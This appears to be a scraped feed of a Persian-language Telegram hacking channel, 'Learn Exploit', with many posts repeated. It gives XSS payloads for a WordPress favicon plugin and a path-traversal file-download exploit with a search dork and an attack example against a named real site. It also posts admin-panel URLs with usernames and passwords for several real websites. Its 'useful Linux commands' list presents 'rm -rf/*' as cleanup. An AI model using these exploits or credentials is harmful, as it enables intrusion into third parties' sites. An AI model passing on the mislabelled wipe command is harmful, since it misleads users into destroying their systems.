Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش XSS در دو سطح low و medium
#Xss #Learning in Two levels : #Low #Medium security
—————
0Day.Today boy's
t.me/LearnExploit
#Xss #Learning in Two levels : #Low #Medium security
—————
0Day.Today boy's
t.me/LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش XSS در دو سطح low و medium
#Xss #Learning in Two levels : #Low #Medium security
—————
بخش هایی که در این فیلم یاد میگیرید :
1 - تست نفوذ XSS در سطح low
2 - رفع این اسیب پذیری از سطح low به medium
3 - تست نفوذ XSS در سطح Medium
—————
Time : 6 min
Qul : 1080
file size : 36 mg
dl link : http://www.mediafire.com/file/sp8x511qm3bkw5p/Xss%20Learning.rar
—————
0Day.Today boy's
t.me/LearnExploit
#Xss #Learning in Two levels : #Low #Medium security
—————
بخش هایی که در این فیلم یاد میگیرید :
1 - تست نفوذ XSS در سطح low
2 - رفع این اسیب پذیری از سطح low به medium
3 - تست نفوذ XSS در سطح Medium
—————
Time : 6 min
Qul : 1080
file size : 36 mg
dl link : http://www.mediafire.com/file/sp8x511qm3bkw5p/Xss%20Learning.rar
—————
0Day.Today boy's
t.me/LearnExploit
MediaFire
Xss Learning
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیری (FTP2FTP ( Arbitrary File Download :
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
دستورات کاربردی لینوکس
دستورات منابع سیستم👇
sudo dpkg-reconfigure tzdata
sudo apt-get update
sudo apt-get install tzdata
نمایش ip
ifconfig
پاکسازی
rm -rf/*
دستور نمایش پردازش ها
top
زمان فعال بودن سیستم و کاربران
up
نمایش اطلاعات پردازنده
cat/proc/cpuinfo
نمایش اطلاعات Ram
cat/proc/meminfo
نمایش جامعی از منابع
uname -a
پاک کردن یک فایل
rm -rf "file name"
ساخت یک پوشه جدید
mkdir "folder name"
وارد شدن به دایرکتوری
cd "directory name"
بازگشت به دایرکتوری قبلی
cd ..
بازگشت به دایرکتوری اصلی
cd -e
$HOME
کپی کردن فایل بین دایرکتوری
cp "name"
جابه جایی فایل بین دایرکتوری
mv "name"
لیست فایل های موجود در دایرکتوری
ls
جستجوی فایل در دایرکتوری ها
find "name"
حذف دایرکتوری
rmdir "directory name"
ادیت فایل در سرور
nano "file name"
اجازه دسترسی کامل به فایل و اجرایی کردن
chmod +x "file name"
chmod 777 "file name"
لیست فایل و فولدر به همراه سایز
ls -l
بستن تمام پروسه های روت
pkill -KILL -u root
خالی کردن ردیس ربات
redis-cli flushall
ایجاد فایل متنی
vi "name.txt"
راه اندازی مجدد ابنتو
shutdown -r now
انزیپ کردن فایل های زیپ
unzip "zip file"
نمایش مسیر دایرکتوری
pwd
پاکسازی صفحه ترمینال
clear
تاریخچه ای از دستورات استفاده شده
history
بستن پروسه های سرور
killall "process name"
ریبوت کردن سرور
reboot
ساختن یک یوزر
sudo adduser "name"
ارتقا یوزر به سودو
sudo adduser "name" sudo
حذف یک یوزر
sudo deluser "name"
حذف دسترسی یوزر به سودو
sudo deluser "name" sudo
مدیریت پسوردهای روت و یوزر
psswd "user"
اجرای خودکار پس از خروج از سرور
screen
نصب پکیج بروی سرور
get-apt install "package name"
حذف یک پکیج از سرور
get-apt remove "package name"
تغییر پورت سرور
sshd_config
دانلود از گیت هاب
git clone "address url.git"
دانلود از لینک
wget "address url"
@LearnExploit
دستورات منابع سیستم👇
sudo dpkg-reconfigure tzdata
sudo apt-get update
sudo apt-get install tzdata
نمایش ip
ifconfig
پاکسازی
rm -rf/*
دستور نمایش پردازش ها
top
زمان فعال بودن سیستم و کاربران
up
نمایش اطلاعات پردازنده
cat/proc/cpuinfo
نمایش اطلاعات Ram
cat/proc/meminfo
نمایش جامعی از منابع
uname -a
پاک کردن یک فایل
rm -rf "file name"
ساخت یک پوشه جدید
mkdir "folder name"
وارد شدن به دایرکتوری
cd "directory name"
بازگشت به دایرکتوری قبلی
cd ..
بازگشت به دایرکتوری اصلی
cd -e
$HOME
کپی کردن فایل بین دایرکتوری
cp "name"
جابه جایی فایل بین دایرکتوری
mv "name"
لیست فایل های موجود در دایرکتوری
ls
جستجوی فایل در دایرکتوری ها
find "name"
حذف دایرکتوری
rmdir "directory name"
ادیت فایل در سرور
nano "file name"
اجازه دسترسی کامل به فایل و اجرایی کردن
chmod +x "file name"
chmod 777 "file name"
لیست فایل و فولدر به همراه سایز
ls -l
بستن تمام پروسه های روت
pkill -KILL -u root
خالی کردن ردیس ربات
redis-cli flushall
ایجاد فایل متنی
vi "name.txt"
راه اندازی مجدد ابنتو
shutdown -r now
انزیپ کردن فایل های زیپ
unzip "zip file"
نمایش مسیر دایرکتوری
pwd
پاکسازی صفحه ترمینال
clear
تاریخچه ای از دستورات استفاده شده
history
بستن پروسه های سرور
killall "process name"
ریبوت کردن سرور
reboot
ساختن یک یوزر
sudo adduser "name"
ارتقا یوزر به سودو
sudo adduser "name" sudo
حذف یک یوزر
sudo deluser "name"
حذف دسترسی یوزر به سودو
sudo deluser "name" sudo
مدیریت پسوردهای روت و یوزر
psswd "user"
اجرای خودکار پس از خروج از سرور
screen
نصب پکیج بروی سرور
get-apt install "package name"
حذف یک پکیج از سرور
get-apt remove "package name"
تغییر پورت سرور
sshd_config
دانلود از گیت هاب
git clone "address url.git"
دانلود از لینک
wget "address url"
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
دستورات کاربردی لینوکس دستورات منابع سیستم👇 sudo dpkg-reconfigure tzdata sudo apt-get update sudo apt-get install tzdata نمایش ip ifconfig پاکسازی rm -rf/* دستور نمایش پردازش ها top زمان فعال بودن سیستم و کاربران up نمایش اطلاعات پردازنده cat/proc/cpuinfo…
#Python #Jadi (2019)
==================
سلام خدمت تمامی دوستان
یه خبر خوش برای تمامی افرادی که علاقمند به یادگیری پایتون جادی میباشند.
دوستان دوره پایتون جادی به ارزش 150 هزار تومان در سایت
http://gotoclass.ir/
رایگان قرار گرفته.
==================
شرایط دوره :
کل دوره به صورت رایگان برگذار شده (با کسب رضایت از صاحب محصول)
جزئیات دوره :
فیلم های اموزشی
تمرین های مربوط به هر بخش
ازمون های مربوطه
در اخر و بعد از تمام کردن دوره شما میتوانید با پرداخت هزینه ی کل دوره صاحب مدرک شوید(فقط در صورتی که بخواهید مدرک دریافت کنید باید مبلغ رو پرداخت کنید)
دوستان توصیه میکنم از دست ندید
نحوه ی استفاده :
ثبت نام کنید و دوره رو اجرا کنید...
لینک دوره ::
http://gotoclass.ir/courses/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86/
==================
دیگر دوره هایی این سایت که بعضیاشون مانند پایتون رایگانه ::
http://gotoclass.ir/courses/
==============================
باتشکر
@LearnExploit
==================
سلام خدمت تمامی دوستان
یه خبر خوش برای تمامی افرادی که علاقمند به یادگیری پایتون جادی میباشند.
دوستان دوره پایتون جادی به ارزش 150 هزار تومان در سایت
http://gotoclass.ir/
رایگان قرار گرفته.
==================
شرایط دوره :
کل دوره به صورت رایگان برگذار شده (با کسب رضایت از صاحب محصول)
جزئیات دوره :
فیلم های اموزشی
تمرین های مربوط به هر بخش
ازمون های مربوطه
در اخر و بعد از تمام کردن دوره شما میتوانید با پرداخت هزینه ی کل دوره صاحب مدرک شوید(فقط در صورتی که بخواهید مدرک دریافت کنید باید مبلغ رو پرداخت کنید)
دوستان توصیه میکنم از دست ندید
نحوه ی استفاده :
ثبت نام کنید و دوره رو اجرا کنید...
لینک دوره ::
http://gotoclass.ir/courses/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86/
==================
دیگر دوره هایی این سایت که بعضیاشون مانند پایتون رایگانه ::
http://gotoclass.ir/courses/
==============================
باتشکر
@LearnExploit
اگر اطلاعات شخصی مربوط به خود را در Dark web جستوجو کنید شاید به اطلاعات حیرت آوری در مورد خودتون دست پیدا کنید.
#0dayToday
@LearnExploit
با لینک زیر میتوانید به صورت رایگان به تعداد محدودی از اطلاعات شخصی خود در Dark web دسترسی پیدا کنید:
https://terbiumlabs.com/
#0dayToday
@LearnExploit
با لینک زیر میتوانید به صورت رایگان به تعداد محدودی از اطلاعات شخصی خود در Dark web دسترسی پیدا کنید:
https://terbiumlabs.com/
ممکنه براتون این سؤال بوجود بیاد که چطور می تونم تو وب تاریک جستوجو کنم ؟ خب سادست در زیر چند تا از موتور های جستوجوی Dark web را می بینید:
Onion.city
Onion.to
Not Evil
ولی توصیه میشه به هیچ وجه وارد Dark web نشوید چون مسئولیتش با خودتونه.
#0daytoday
@LearnExploit
Onion.city
Onion.to
Not Evil
ولی توصیه میشه به هیچ وجه وارد Dark web نشوید چون مسئولیتش با خودتونه.
#0daytoday
@LearnExploit
چند نمونه از موتور های جستوجوی Deep web یا وب عمیق رو در زیر مشاهده می کنید:
- The WWW Virtual Library
- Collection of Deep web research tools
- Surfwax
- icerocket
- stumpedia
#0daytoday
@LearnExploit
- The WWW Virtual Library
- Collection of Deep web research tools
- Surfwax
- icerocket
- stumpedia
#0daytoday
@LearnExploit
Forwarded from کانال رسمی بازی سازی با بیلدباکس (!#!)
Media is too big
VIEW IN TELEGRAM
اگه میخواید بصورت خیلی ساده و راحت متوجه بشید که آسیب پذیری Xss از نوع Dom چی هستش این ویدیو رو ببینید...
Forwarded from never lose hope
This media is not supported in your browser
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۱ - شروع
Forwarded from utubebot
Media is too big
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۲ - ساده ترین دستور: پرینت
Forwarded from never lose hope
This media is not supported in your browser
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۳ - شرط ایف
Forwarded from never lose hope
Media is too big
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۴ - برنامه نوشتن در یک فایل
#Admin_Panel
****************
http://www.adawatint.com/manage/login.php
User:admin
Pass:admin
****************
@LearnExploit
****************
http://www.adawatint.com/manage/login.php
User:admin
Pass:admin
****************
@LearnExploit
#Admin_Panel
****************
http://hockman.ru/login.php
User:Montreal Canadiens
Pass:Montreal Canadiens
****************
@LearnExploit
****************
http://hockman.ru/login.php
User:Montreal Canadiens
Pass:Montreal Canadiens
****************
@LearnExploit
#Admin_Panel
****************
http://www.riosdevida.com/login.php
User: pablo.sparta@riosdevida.com
Pass:psparta
****************
@LearnExploit
****************
http://www.riosdevida.com/login.php
User: pablo.sparta@riosdevida.com
Pass:psparta
****************
@LearnExploit
#Admin_Panel
****************
http://ofertasb.com/admin/
User:Jose
Pass:Bola_2016
****************
@LearnExploit
****************
http://ofertasb.com/admin/
User:Jose
Pass:Bola_2016
****************
@LearnExploit